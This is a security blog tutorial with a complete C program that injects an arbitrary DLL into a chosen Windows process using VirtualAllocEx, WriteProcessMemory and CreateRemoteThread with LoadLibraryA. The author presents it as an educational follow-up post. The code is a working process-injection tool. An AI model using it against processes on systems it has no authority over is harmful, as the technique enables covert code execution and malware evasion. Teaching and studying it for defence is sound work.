Wednesday, November 4, 2020

Continuing DLL Injection via CreateRemoteThread

In a previous post on DLL injection, I hardcoded the code for the DLL. In this post, I am giving you the opportunity to specify your process ID and DLL to be injected.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
/*
* DLL Injection - using create remote thread 
* This is a follow-up to my previous blog posts and as in the previous instance, 
*  this is purely for educational purposes.
* https://www.securitynik.com/2019/01/beginning-dll-injection-with-windows_23.html
* https://www.securitynik.com/2019/01/beginning-dll-injection-with-windows.html
* 
* In those previous posts, I required admin privileges. In this post, I'm working without admin privileges
* Author Nik Alleyne
* Author Blog: www.securitynik.com
* File: dllInjection-CreateRemoteThread.c
* Date: October 4, 2020
*/


#include <windows.h>
#include <Psapi.h>
#include <stdio.h>

int main(int argc, char* argv[])
{
	// Clear the screen before getting started
	system("cls");

	// Check to see if the number of arguments, equals 3.
	// First argument is the program, second is the process PID and third is the full path to the DLL
	
	if (argc != 3)
	{
		printf(" ===========================================================================\n");
		printf("[*] Usage info. | dllInjection-CreateRemoteThread.exe \n");
		printf("[*]");
		printf("dllInjection-CreateRemoteThread.exe PID Path to DLL \n");
		printf("\t eg. dllInjection-CreateRemoteThread.exe 3000 c:\\tmp\\mydll.dll \n");
		printf(" ===========================================================================\n");
		return -1;
	}

	printf("                  Beginning the DLL Injection Process ... \n");
	printf("------------------------------------------------------------------------------ \n");
	Sleep(1000);

	printf("[*] Enumerating all processes ... \n");
	Sleep(1000);

	// Setup point to the array which will hold the processes
	DWORD myProcessList[4096], sizeOfArray, totalProcesses;
	if (!EnumProcesses(myProcessList, sizeof(myProcessList), &sizeOfArray))
	{
		printf(" [!] Error Code: %u was encountered while retrieving processes information \n", GetLastError());
		return -1;
	}

	// calculate the number of processes returned
	totalProcesses = sizeOfArray / sizeof(DWORD);
	printf(" [*] There were %u processes found \n", totalProcesses);
	Sleep(1000);

	printf("[*] Searching for process with PID:%u \n", atoi(argv[1]));
	// Create a variable to track if the PID was found
	BOOL pidFound = FALSE;

	// Find the process with PID of interest
	// first declare a counter for the array
	unsigned int count = 0;
	for (count; count < totalProcesses; count++)
		if (myProcessList[count] == atoi(argv[1]))
		{
			pidFound = TRUE;
			break;
		}
	

	if (!pidFound)
	{
		printf(" [!] Unable to locate the process with PID:%u \n", atoi(argv[1]));
		return -1;
	}
		
	printf(" [*] Process with PID:%u Found \n", atoi(argv[1]));
	Sleep(1000);

	// Now that the PID exists, open a handle to it.
	printf("[+] Opening a handle to process with PID:%u  ...\n", atoi(argv[1]));

	HANDLE myRemoteProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, NULL, atoi(argv[1]));
	if (!myRemoteProcessHandle)
	{
		printf(" [!] Error %u occured while attempting to get a handle \n", GetLastError());
		return -1;
	}
	
	printf(" [+] Handle 0x%p successfully opened \n", myRemoteProcessHandle);
	Sleep(1000);

	// Allocating space in memory
	printf("[+] Allocating space in the memory of process with PID: %u \n", atoi(argv[1]));
	VOID* myRemoteProcessAddress = VirtualAllocEx(myRemoteProcessHandle, NULL, 256, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (!myRemoteProcessAddress)
	{
		printf(" [!] Unable to allocate space in the process. Error code was %u \n", GetLastError());
		return -1;
	}

	printf(" [+] Space successfully allocated \n");
	Sleep(1000);

	// Writing DLL Path to process Memory
	printf("[+] Writing to the process memory ... \n");
	if (!WriteProcessMemory(myRemoteProcessHandle, myRemoteProcessAddress, argv[2], strlen(argv[2]), nullptr))
	{
		printf(" [!] Error %u encountered while writing to the process with PID:%u memory \n", GetLastError(), atoi(argv[1]));
		return -1;
	}
	printf(" [+] Process memory successfully written ... \n");
	Sleep(1000);

	// Executing the remote threat
	printf("[+] Creating the remote thread ...\n");
	HANDLE myRemoteProcessNewThread = CreateRemoteThread(myRemoteProcessHandle, nullptr, 0, (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA"), myRemoteProcessAddress, 0, nullptr);

	if (!myRemoteProcessNewThread)
	{
		printf(" [!] Error occurred while creating remote thread!\n");
		return -1;
	}

	printf(" [+] Remote thread successfully created \n");
	Sleep(1000);

	// Close up shop
	CloseHandle(myRemoteProcessHandle);
	printf("[*] I'm done my work. See ya and hope you enjoyed that demo! \n");
	
	return 0;
}



/*
* References:
* https://docs.microsoft.com/en-us/windows/win32/psapi/enumerating-all-modules-for-a-process
* https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumprocesses
* https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess
* https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
* https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory
* 
*/

Have fun!

No comments:

Post a Comment